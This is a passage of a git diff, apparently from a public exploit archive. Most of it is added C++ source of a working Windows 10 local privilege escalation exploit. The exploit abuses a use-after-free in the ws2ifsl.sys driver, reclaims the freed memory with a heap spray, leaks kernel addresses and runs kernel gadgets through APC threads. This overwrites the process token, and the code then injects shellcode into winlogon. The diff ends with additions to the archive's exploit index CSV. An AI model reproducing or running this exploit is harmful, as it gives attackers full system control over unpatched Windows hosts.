(unsigned int i = 0; i < buffer->ModulesCount; i++) + { + PVOID kernelImageBase = buffer->Modules[i].ImageBaseAddress; + PCHAR kernelImage = (PCHAR)buffer->Modules[i].Name; + if (_stricmp(kernelImage, modName) == 0) + { + free(buffer); + return (DWORD64)kernelImageBase; + } + } + free(buffer); + return 0; +} + + +DWORD64 GetKernelPointer(HANDLE handle, DWORD type) +{ + PSYSTEM_HANDLE_INFORMATION buffer = (PSYSTEM_HANDLE_INFORMATION) malloc(0x20); + + DWORD outBuffer = 0; + NTSTATUS status = NtQuerySystemInformation((SYSTEM_INFORMATION_CLASS)SystemHandleInformation, buffer, 0x20, &outBuffer); + + if (status == STATUS_INFO_LENGTH_MISMATCH) + { + free(buffer); + buffer = (PSYSTEM_HANDLE_INFORMATION) malloc(outBuffer); + status = NtQuerySystemInformation((SYSTEM_INFORMATION_CLASS)SystemHandleInformation, buffer, outBuffer, &outBuffer); + } + + if (!buffer) + { + printf("[-] NtQuerySystemInformation error \n"); + return 0; + } + + for (size_t i = 0; i < buffer->NumberOfHandles; i++) + { + DWORD objTypeNumber = buffer->Handels[i].ObjectTypeNumber; + + if (buffer->Handels[i].ProcessId == GetCurrentProcessId() && buffer->Handels[i].ObjectTypeNumber == type) + { + if (handle == (HANDLE)buffer->Handels[i].Handle) + { + //printf("%p %d %x\n", buffer->Handels[i].Object, buffer->Handels[i].ObjectTypeNumber, buffer->Handels[i].Handle); + DWORD64 object = (DWORD64)buffer->Handels[i].Object; + free(buffer); + return object; + } + } + } + printf("[-] handle not found\n"); + free(buffer); + return 0; +} + +DWORD64 GetGadgetAddr(const char* name) +{ + DWORD64 base = GetModuleAddr("\\SystemRoot\\system32\\ntoskrnl.exe"); + HMODULE mod = GetNOSModule(); + if (!mod) + { + printf("[-] leaking ntoskrnl version\n"); + return 0; + } + DWORD64 offset = (DWORD64)GetProcAddress(mod, name); + + DWORD64 returnValue = base + offset - (DWORD64)mod; + FreeLibrary(mod); + return returnValue; +} + +/* + After the bug is triggerd the first thime, this threads gets notified and it will trigger its function pointer, + which will call our gadget function and write the first 8 bytes. +*/ +DWORD WINAPI APCThread1(LPVOID lparam) +{ + SetEvent(g_Event1); + while (1) + { + if (g_done1) + { + printf("[+] triggering first APC execution\n"); + + g_NtTestAlert(); + + while (1) + { + Sleep(0x1000); + } + } + else + { + Sleep(1); + } + } + return 0; +} + +/* + After the bug is triggerd the second thime, this threads gets notified and it will trigger its function pointer again and write the second 8 bytes. + After that the shellcode is injected into the system process. +*/ +DWORD WINAPI APCThread2(LPVOID lparam) +{ + SetEvent(g_Event2); + while (1) + { + if (g_done2) + { + printf("[+] triggering second APC execution\n"); + + g_NtTestAlert(); + + InjectToWinlogon(); + SetEvent(g_Event3); + + while (1) + { + Sleep(0x1000); + } + } + else + { + Sleep(1); + } + } + return 0; +} + +HANDLE CreateSocketHandle(HANDLE procHandle) +{ + HANDLE fileHandle = 0; + UNICODE_STRING deviceName; + OBJECT_ATTRIBUTES object; + IO_STATUS_BLOCK IoStatusBlock; + + RtlInitUnicodeString(&deviceName, (PWSTR)L"\\Device\\WS2IFSL\\NifsSct"); + + InitializeObjectAttributes(&object, &deviceName, 0, NULL, NULL); + + FILE_FULL_EA_INFORMATION* eaBuffer = (FILE_FULL_EA_INFORMATION*)malloc(sizeof(FILE_FULL_EA_INFORMATION) + sizeof("NifsSct") + sizeof(SOCK_DATA)); + if (!eaBuffer) + { + printf("[-] malloc error\n"); + return fileHandle; + } + eaBuffer->NextEntryOffset = 0; + eaBuffer->Flags = 0; + eaBuffer->EaNameLength = sizeof("NifsSct") - 1; + eaBuffer->EaValueLength = sizeof(SOCK_DATA); + + RtlCopyMemory(eaBuffer->EaName, "NifsSct", (SIZE_T)eaBuffer->EaNameLength + 1); + + SOCK_DATA * eaData = (SOCK_DATA*)(((char*)eaBuffer) + sizeof(FILE_FULL_EA_INFORMATION) + sizeof("NifsSct") - 4); + + eaData->unknown = (void*) 0x242424224; + eaData->procDataHandle = (void*) procHandle; + + NTSTATUS status = NtCreateFile(&fileHandle, GENERIC_WRITE, &object, &IoStatusBlock, NULL, FILE_ATTRIBUTE_NORMAL, 0, FILE_OPEN_IF, 0, eaBuffer, sizeof(FILE_FULL_EA_INFORMATION) + sizeof("NifsSct") + sizeof(PROC_DATA)); + if (status != STATUS_SUCCESS) + { + printf("[-] NtCreateFile error: %x \n", status); + free(eaBuffer); + return fileHandle; + } + + free(eaBuffer); + return fileHandle; +} + +HANDLE CreateProcessHandle(HANDLE hAPCThread) +{ + HANDLE fileHandle = 0; + UNICODE_STRING deviceName; + OBJECT_ATTRIBUTES object; + IO_STATUS_BLOCK IoStatusBlock; + + RtlInitUnicodeString(&deviceName, (PWSTR)L"\\Device\\WS2IFSL\\NifsPvd"); + + InitializeObjectAttributes(&object, &deviceName, 0, NULL, NULL); + + FILE_FULL_EA_INFORMATION* eaBuffer = (FILE_FULL_EA_INFORMATION*)malloc(sizeof(FILE_FULL_EA_INFORMATION) + sizeof("NifsPvd") + sizeof(PROC_DATA)); + if (!eaBuffer) + { + printf("[-] malloc error\n"); + return fileHandle; + } + eaBuffer->NextEntryOffset = 0; + eaBuffer->Flags = 0; + eaBuffer->EaNameLength = sizeof("NifsPvd") - 1; + eaBuffer->EaValueLength = sizeof(PROC_DATA); + + RtlCopyMemory(eaBuffer->EaName, "NifsPvd", (SIZE_T)eaBuffer->EaNameLength + 1); + PROC_DATA * eaData = (PROC_DATA*)(((char*)eaBuffer) + sizeof(FILE_FULL_EA_INFORMATION) + sizeof("NifsPvd") - 4); + + if (!hAPCThread) + { + printf("[-] error thread not found\n"); + free(eaBuffer); + return 0; + } + + eaData->apcthread = (void*) hAPCThread; // thread must be in current process + eaData->unknown1 = (void*) 0x2222222; // APC Routine + eaData->unknown2 = (void*) 0x3333333; // cancel Rundown Routine + eaData->unknown3 = (void*) 0x4444444; + eaData->unknown4 = (void*) 0x5555555; + + NTSTATUS status = NtCreateFile(&fileHandle, MAXIMUM_ALLOWED, &object, &IoStatusBlock, NULL, FILE_ATTRIBUTE_NORMAL, 0, FILE_OPEN_IF, 0, eaBuffer, sizeof(FILE_FULL_EA_INFORMATION) + sizeof("NifsPvd") + sizeof(PROC_DATA)); + if (status != STATUS_SUCCESS) + { + printf("[-] NtCreateFile error: %x \n", status); + free(eaBuffer); + return fileHandle; + } + + free(eaBuffer); + return fileHandle; +} + +int DoHeapSpray(DWORD64 writeAddress, DWORD64 kthreadAddress) +{ + DWORD64 nopPointer = GetGadgetAddr("xHalTimerWatchdogStop"); + if (!nopPointer) + { + printf("[-] SeSetAccessStateGenericMapping not found\n"); + return 0; + } + + DWORD64 funPointer = GetGadgetAddr("SeSetAccessStateGenericMapping"); + if (!funPointer) + { + printf("[-] SeSetAccessStateGenericMapping not found\n"); + return 0; + } + + UCHAR payload[0x120 - 0x48]; + memset(payload, 0x0, sizeof(payload)); + + DWORD64 x = 0x41414141414141; + memcpy(payload, &x, 8); + + x = 0x12121212; + memcpy(payload + 8, &x, 8); + + x = kthreadAddress + OFFSET_LINKEDLIST; // apc linked list + memcpy(payload + 0x10, &x, 8); + + x = kthreadAddress + OFFSET_LINKEDLIST; + memcpy(payload + 0x18, &x, 8); + + x = funPointer; + memcpy(payload + 0x20, &x, 8); // this is the RIP we want to execute, in case of NtTestAlert + + x = nopPointer; + memcpy(payload + 0x28, &x, 8); // this is the RIP we want to execute, in case of rundown routine + + x = 0xffffffffffffffff; // this is to be written + memcpy(payload + 0x30, &x, 8); + + x = 0xffffffffffffffff; // this is to be written, but it gets changed.. + memcpy(payload + 0x38, &x, 8); + + x = 0x2424242424242424; + memcpy(payload + 0x40, &x, 8); + + x = writeAddress; // this is where to write + memcpy(payload + 0x48, &x, 8); + + for (size_t i = 0; i < 0x70; i++) + { + HANDLE readPipe; + HANDLE writePipe; + DWORD resultLength = 0; + + BOOL res = CreatePipe(&readPipe, &writePipe, NULL, sizeof(payload)); + if (!res) + { + printf("[-] error creating pipe\n"); + return 0; + } + res = WriteFile(writePipe, payload, sizeof(payload), &resultLength, NULL); + } + + return 1; +} + +/* + This function will trigger the use after free in ws2ifsl.sys and + will try to reallocate the buffer with controlled content. +*/ +void TriggerBug(HANDLE threadHandle, DWORD64 writeAddress, DWORD64 kthreadAddress, int id) +{ + HANDLE procHandle = CreateProcessHandle(threadHandle); + printf("[!] procHandle %x\n", (DWORD)procHandle); + + HANDLE sockHandle = CreateSocketHandle(procHandle); + printf("[!] sockHandle %x\n", (DWORD)sockHandle); + + char* readBuffer = (char*)malloc(0x100); + DWORD bytesRead = 0; + + IO_STATUS_BLOCK io; + LARGE_INTEGER byteOffset; + byteOffset.HighPart = 0; + byteOffset.LowPart = 0; + byteOffset.QuadPart = 0; + byteOffset.u.LowPart = 0; + byteOffset.u.HighPart = 0; + ULONG key = 0; + + CloseHandle(procHandle); + + NTSTATUS ret = g_NtWriteFile(sockHandle, 0, 0, 0, &io, readBuffer, 0x100, &byteOffset, &key); + + // this close the objecte and we trigger the use after free + CloseHandle(sockHandle); + + // this spray will reclaim the buffer + if (!DoHeapSpray(writeAddress, kthreadAddress)) + { + printf("[-] error doHeapSpray\n"); + return; + } + + if (id == 1) + { + g_done1 = 1; + } + + if (id == 2) + { + g_done2 = 1; + } + + printf("[+] done\n"); + Sleep(0x20); + free(readBuffer); + + return; +} + +/* + This function resolves all function pointer for native api calls. +*/ +bool InitFunctionPointers() +{ + HMODULE hNtDll = NULL; + hNtDll = LoadLibrary("ntdll.dll"); + if (!hNtDll) + { + printf("error\n"); + return false; + } + + g_NtTestAlert = (NtTestAlert_t)GetProcAddress(hNtDll, "NtTestAlert"); + if (!g_NtTestAlert) + { + printf("error\n"); + return false; + } + + g_NtWriteFile = (NtWriteFile_t)GetProcAddress(hNtDll, "NtWriteFile"); + if (!g_NtWriteFile) + { + printf("[-] GetProcAddress() NtWriteFile failed.\n"); + return false; + } + + g_RtlGetVersion = (RtlGetVersion_t)GetProcAddress(hNtDll, "RtlGetVersion"); + if (!g_NtWriteFile) + { + printf("[-] GetProcAddress() RtlGetVersion failed.\n"); + return false; + } + + return true; +} + +int main() +{ + // intialize event for thread synchronization + g_Event1 = CreateEvent(0, 0, 0, 0); + g_Event2 = CreateEvent(0, 0, 0, 0); + g_Event3 = CreateEvent(0, 0, 0, 0); + + if (g_Event1 == INVALID_HANDLE_VALUE || !g_Event1) + { + printf("[-] CreateEvent failed\n"); + return 0; + } + if (g_Event2 == INVALID_HANDLE_VALUE || !g_Event2) + { + printf("[-] CreateEvent failed\n"); + return 0; + } + if (g_Event3 == INVALID_HANDLE_VALUE || !g_Event2) + { + printf("[-] CreateEvent failed\n"); + return 0; + } + + if (!InitFunctionPointers()) + { + printf("[-] InitFunctionPointers failed\n"); + return 0; + } + + HANDLE proc = OpenProcess(PROCESS_QUERY_INFORMATION, FALSE, GetCurrentProcessId()); + if (!proc) + { + printf("[-] OpenProcess failed\n"); + return 0; + } + HANDLE token = 0; + if (!OpenProcessToken(proc, TOKEN_ADJUST_PRIVILEGES, &token)) + { + printf("[-] OpenProcessToken failed\n"); + return 0; + } + + DWORD64 ktoken = GetKernelPointer(token, 0x5); + DWORD64 where = ktoken + TOKEN_OFFSET; + + printf("[+] found token at: %p\n", (DWORD64) ktoken); + + + // check the supported version of this exploit, otherwise we would crash + RTL_OSVERSIONINFOW osversion; + g_RtlGetVersion(&osversion); + + if (osversion.dwMajorVersion == 10 && osversion.dwBuildNumber == 18362) + { + printf("[+] version supported\n"); + } + else + { + printf("[-] sorry version not supported\n"); + return 0; + } + + HANDLE hAPCThread1 = CreateThread(0, 0, APCThread1, 0, 0, 0); + if (hAPCThread1 == INVALID_HANDLE_VALUE || !hAPCThread1) + { + printf("[-] error CreateThread\n"); + return 0; + } + + HANDLE hAPCThread2 = CreateThread(0, 0, APCThread2, 0, 0, 0); + if (hAPCThread2 == INVALID_HANDLE_VALUE || !hAPCThread2) + { + printf("[-] error CreateThread\n"); + return 0; + } + + DWORD64 threadAddrAPC1 = GetKernelPointer(hAPCThread1, 0x8); + if (!threadAddrAPC1) + { + printf("[-] GetKernelPointer error \n"); + return 0; + } + DWORD64 threadAddrAPC2 = GetKernelPointer(hAPCThread2, 0x8); + if (!threadAddrAPC2) + { + printf("[-] GetKernelPointer error \n"); + return 0; + } + + // wait for threads to be initialized + WaitForSingleObject(g_Event1, -1); + WaitForSingleObject(g_Event2, -1); + + TriggerBug(hAPCThread1, where-8, threadAddrAPC1, 1); + TriggerBug(hAPCThread2, where, threadAddrAPC2, 2); + + WaitForSingleObject(g_Event3, -1); + + ExitProcess(0); + + return 0; +} \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 1c47b4565..72d27ef6a 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -10902,6 +10902,9 @@ id,file,description,date,author,type,platform,port 47910,exploits/windows/local/47910.py,"Allok RM RMVB to AVI MPEG DVD Converter 3.6.1217 - Stack Overflow (SEH)",2020-01-13,antonio,local,windows, 47915,exploits/windows/local/47915.py,"Microsoft Windows 10 build 1809 - Local Privilege Escalation (UAC Bypass)",2020-01-13,"Nassim Asrir",local,windows, 47916,exploits/windows/local/47916.txt,"VPN unlimited 6.1 - Unquoted Service Path",2020-01-14,"Amin Rawah",local,windows, +47932,exploits/multiple/local/47932.c,"SunOS 5.10 Generic_147148-26 - Local Privilege Escalation",2020-01-16,"Marco Ivaldi",local,multiple, +47933,exploits/windows/local/47933.rb,"Microsoft Windows - CryptoAPI (Crypt32.dll) Elliptic Curve Cryptography (ECC) Spoof Code-Signing Certificate",2020-01-15,"Oliver Lyak",local,windows, +47935,exploits/windows_x86-64/local/47935.cpp,"Microsoft Windows 10 (19H1 1901 x64) - 'ws2ifsl.sys' Use After Free Local Privilege Escalation (kASLR kCFG SMEP)",2020-01-07,bluefrostsec,local,windows_x86-64, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 @@ -17930,6 +17933,7 @@ id,file,description,date,author,type,platform,port 47889,exploits/linux/remote/47889.txt,"ASTPP VoIP 4.0.1 - Remote Code Execution",2020-01-08,"Fabien AUNAY",remote,linux, 47891,exploits/java/remote/47891.txt,"JetBrains TeamCity 2018.2.4 - Remote Code Execution",2020-01-08,hantwister,remote,java, 47924,exploits/linux/remote/47924.rb,"Barco WePresent - file_transfer.cgi Command Injection (Metasploit)",2020-01-15,Metasploit,remote,linux, +47936,exploits/hardware/remote/47936.js,"Sagemcom F@ST 3890 (50_10_19-T1) Cable Modem - 'Cable Haunt' Remote Code Execution",2020-01-15,Lyrebirds,remote,hardware, 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php, 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php, 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php, @@ -27862,7 +27866,7 @@ id,file,description,date,author,type,platform,port 21206,exploits/php/webapps/21206.txt,"PHP-Nuke AddOn PHPToNuke.php 1.0 - Cross-Site Scripting",2002-01-06,frog,webapps,php, 21208,exploits/cgi/webapps/21208.txt,"YaBB 9.1.2000 - Cross-Agent Scripting",2002-01-09,Obscure,webapps,cgi, 21209,exploits/cgi/webapps/21209.txt,"Ultimate Bulletin Board 5.4/6.0/6.2 - Cross-Agent Scripting",2002-01-09,Obscure,webapps,cgi, -21220,exploits/php/webapps/21220.txt,"VICIDIAL Call Center Suite 2.2.1-237 - Multiple Vulnerabilities",2012-09-10,"Sepahan TelCom IT Group",webapps,php, +21220,exploits/php/webapps/21220.txt,"VICIDIAL Call Center Suite 2.2.1-237 - Multiple Vulnerabilities",2012-09-10,"Ertebat Gostar Co",webapps,php, 21221,exploits/php/webapps/21221.txt,"Joomla! Component RokModule 1.1 - 'module' Blind SQL Injection",2012-09-10,Yarolinux,webapps,php, 21222,exploits/php/webapps/21222.txt,"SiteGo - Remote File Inclusion",2012-09-10,L0n3ly-H34rT,webapps,php, 21230,exploits/php/webapps/21230.txt,"PHP-Nuke 4.x/5.x - Arbitrary File Inclusion",2002-01-16,"Handle Nopman",webapps,php, @@ -36514,7 +36518,7 @@ id,file,description,date,author,type,platform,port 35904,exploits/jsp/webapps/35904.txt,"ManageEngine ServiceDesk Plus 9.0 < Build 9031 - User Privileges Management",2015-01-26,"Rewterz - Research Group",webapps,jsp, 35906,exploits/php/webapps/35906.txt,"PHP Webquest 2.6 - SQL Injection",2015-01-26,"jordan root",webapps,php, 35908,exploits/multiple/webapps/35908.txt,"SWFupload 2.5.0 - Cross Frame Scripting (XFS)",2015-01-26,MindCracker,webapps,multiple, -35910,exploits/jsp/webapps/35910.txt,"ManageEngine EventLog Analyzer 9.0 - Directory Traversal / Cross-Site Scripting",2015-01-26,"Sepahan TelCom IT Group",webapps,jsp, +35910,exploits/jsp/webapps/35910.txt,"ManageEngine EventLog Analyzer 9.0 - Directory Traversal / Cross-Site Scripting",2015-01-26,"Ertebat Gostar Co",webapps,jsp, 35911,exploits/multiple/webapps/35911.txt,"jclassifiedsmanager - Multiple Vulnerabilities",2015-01-26,"Sarath Nair",webapps,multiple, 36313,exploits/php/webapps/36313.txt,"webERP 4.3.8 - Multiple Script URI Cross-Site Scripting Vulnerabilities",2011-11-17,"High-Tech Bridge SA",webapps,php, 35982,exploits/windows/webapps/35982.txt,"Hewlett-Packard (HP) UCMDB - JMX-Console Authentication Bypass",2015-02-03,"Hans-Martin Muench",webapps,windows,8080 @@ -36532,7 +36536,7 @@ id,file,description,date,author,type,platform,port 35929,exploits/php/webapps/35929.txt,"Joomla! Component com_voj - SQL Injection",2011-07-08,CoBRa_21,webapps,php, 35930,exploits/php/webapps/35930.txt,"Prontus CMS - 'page' Cross-Site Scripting",2011-07-11,Zerial,webapps,php, 35931,exploits/php/webapps/35931.txt,"ICMusic 1.2 - 'music_id' SQL Injection",2011-07-11,kaMtiEz,webapps,php, -35933,exploits/hardware/webapps/35933.txt,"ManageEngine Firewall Analyzer 8.0 - Directory Traversal / Cross-Site Scripting",2015-01-29,"Sepahan TelCom IT Group",webapps,hardware, +35933,exploits/hardware/webapps/35933.txt,"ManageEngine Firewall Analyzer 8.0 - Directory Traversal / Cross-Site Scripting",2015-01-29,"Ertebat Gostar Co",webapps,hardware, 35940,exploits/php/webapps/35940.txt,"Sphider 1.3.x - Admin Panel Multiple SQL Injections",2011-07-12,"Karthik R",webapps,php, 35941,exploits/multiple/webapps/35941.txt,"Flowplayer 3.2.7 - 'linkUrl' Cross-Site Scripting",2011-07-12,"Szymon Gruszecki",webapps,multiple, 35942,exploits/php/webapps/35942.txt,"TCExam 11.2.x - Multiple Cross-Site Scripting Vulnerabilities",2011-07-13,"Gjoko Krstic",webapps,php, @@ -37752,7 +37756,7 @@ id,file,description,date,author,type,platform,port 37781,exploits/php/webapps/37781.txt,"Extcalendar 2.0 - Multiple SQL Injections / HTML Injection Vulnerabilities",2012-09-05,"Ashiyane Digital Security Team",webapps,php, 37782,exploits/php/webapps/37782.txt,"web@all - Local File Inclusion / Multiple Arbitrary File Upload Vulnerabilities",2012-09-06,KedAns-Dz,webapps,php, 37784,exploits/php/webapps/37784.txt,"Pinterestclones - Security Bypass / HTML Injection",2012-09-08,DaOne,webapps,php, -37785,exploits/php/webapps/37785.txt,"VICIDIAL Call Center Suite - Multiple SQL Injections",2012-09-10,"Sepahan TelCom IT Group",webapps,php, +37785,exploits/php/webapps/37785.txt,"VICIDIAL Call Center Suite - Multiple SQL Injections",2012-09-10,"Ertebat Gostar Co",webapps,php, 37786,exploits/php/webapps/37786.txt,"DELTAScripts PHP Links - Multiple SQL Injections",2012-09-10,L0n3ly-H34rT,webapps,php, 37787,exploits/php/webapps/37787.txt,"WordPress Plugin Download Monitor - 'dlsearch' Cross-Site Scripting",2012-08-30,"Chris Cooper",webapps,php, 37789,exploits/php/webapps/37789.txt,"OpenFiler 2.3 - Multiple Cross-Site Scripting / Information Disclosure Vulnerabilities",2012-09-06,"Brendan Coles",webapps,php, @@ -42223,5 +42227,13 @@ id,file,description,date,author,type,platform,port 47914,exploits/php/webapps/47914.txt,"Digi AnywhereUSB 14 - Reflective Cross-Site Scripting",2020-01-13,"Raspina Net Pars Group",webapps,php, 47917,exploits/hardware/webapps/47917.txt,"IBM RICOH InfoPrint 6500 Printer - HTML Injection",2020-01-14,"Ismail Tasdelen",webapps,hardware, 47918,exploits/hardware/webapps/47918.txt,"IBM RICOH 6400 Printer - HTML Injection",2020-01-14,"Ismail Tasdelen",webapps,hardware, -47922,exploits/php/webapps/47922.txt,"Online Book Store 1.0 - 'bookisbn' SQL Injection",2020-01-15,"Sepahan TelCom IT Group",webapps,php, +47922,exploits/php/webapps/47922.txt,"Online Book Store 1.0 - 'bookisbn' SQL Injection",2020-01-15,"Ertebat Gostar Co",webapps,php, 47923,exploits/hardware/webapps/47923.rb,"Huawei HG255 - Directory Traversal ( Metasploit )",2020-01-15,"Ismail Tasdelen",webapps,hardware, +47925,exploits/php/webapps/47925.txt,"WordPress Plugin Postie 1.9.40 - Persistent Cross-Site Scripting",2020-01-16,V1n1v131r4,webapps,php, +47926,exploits/php/webapps/47926.txt,"Rukovoditel Project Management CRM 2.5.2 - 'reports_id' SQL Injection",2020-01-16,"Fatih Çelik",webapps,php, +47927,exploits/java/webapps/47927.txt,"Jenkins Gitlab Hook Plugin 1.4.2 - Reflected Cross-Site Scripting",2020-01-16,"Ai Ho",webapps,java, +47928,exploits/php/webapps/47928.txt,"Online Book Store 1.0 - Arbitrary File Upload",2020-01-16,Or4nG.M4N,webapps,php, +47929,exploits/multiple/webapps/47929.rb,"Tautulli 2.1.9 - Denial of Service ( Metasploit )",2020-01-16,"Ismail Tasdelen",webapps,multiple, +47930,exploits/multiple/webapps/47930.txt,"Citrix Application Delivery Controller (ADC) and Gateway 13.0 - Path Traversal",2020-01-16,"Dhiraj Mishra",webapps,multiple, +47931,exploits/php/webapps/47931.txt,"Rukovoditel Project Management CRM 2.5.2 - 'entities_id' SQL Injection",2020-01-16,"Fatih Çelik",webapps,php, +47934,exploits/php/webapps/47934.txt,"Rukovoditel Project Management CRM 2.5.2 - 'filters' SQL Injection",2020-01-16,"Fatih Çelik",webapps,php,